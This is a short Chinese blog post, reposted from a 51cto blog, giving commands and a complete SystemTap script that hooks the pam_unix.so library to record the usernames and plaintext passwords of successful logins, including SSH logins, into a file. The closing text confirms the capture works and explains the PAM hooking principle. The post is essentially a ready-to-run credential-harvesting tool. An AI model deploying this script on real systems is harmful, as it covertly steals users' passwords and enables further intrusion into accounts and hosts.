yum –releasever=6.4 update

yum install -y systemtap

debuginfo-install $(rpm -qf /lib/security/pam_unix.so)

touch /root/capture_pass.stp

#!/usr/bin/stap
global username, pass, isSuccRet = 1;
probe process(“/lib/security/pam_unix.so”).function(“_unix_verify_password”)
{
username = user_string($name);
pass = user_string($p);
}
probe process(“/lib/security/pam_unix.so”).function(“_unix_verify_password”).return
{
if ($return == 0)
{
printf(“User: %s\nPassword: %s\n\n”, username, pass);
isSuccRet = 0;
}
}
probe process(“/lib/security/pam_unix.so”).function(“pam_sm_open_session”)
{
if (isSuccRet != 0)
{
printf(“Login via ssh service.\n\User: %s\nPassword: %s\n\n”, username, pass);
}
isSuccRet = 1;
}

touch password.txt

chmod +x capture_pass.stp

stap capture_pass.stp -o password.txt

151457146

本地执行capture_pass.stp脚本,同时ssh远程登录系统,即使第一次登录失败也没有问题,不会记录尝试输入的错误密码。登录成功后ctl+C终止脚本运行,查看password.txt,成功捕获。

2

原理主要是对PAM模块pam_unix.so库文件的函数调用进行捕获,因为用户登录认证需要使用pam_unix.so库文件。

转自老徐51cto博客

作者 网路游侠

游侠安全网,前身为网路游侠的信息与网络安全博客,站长张百川。专注:网络安全、系统安全、应用安全、数据库安全、运维安全,及网络安全、信息安全前沿技术研究与发展趋势分析。对关键信息基础设施安全防护管理平台、网络安全态势感知平台、网络安全协调指挥平台有一定关注。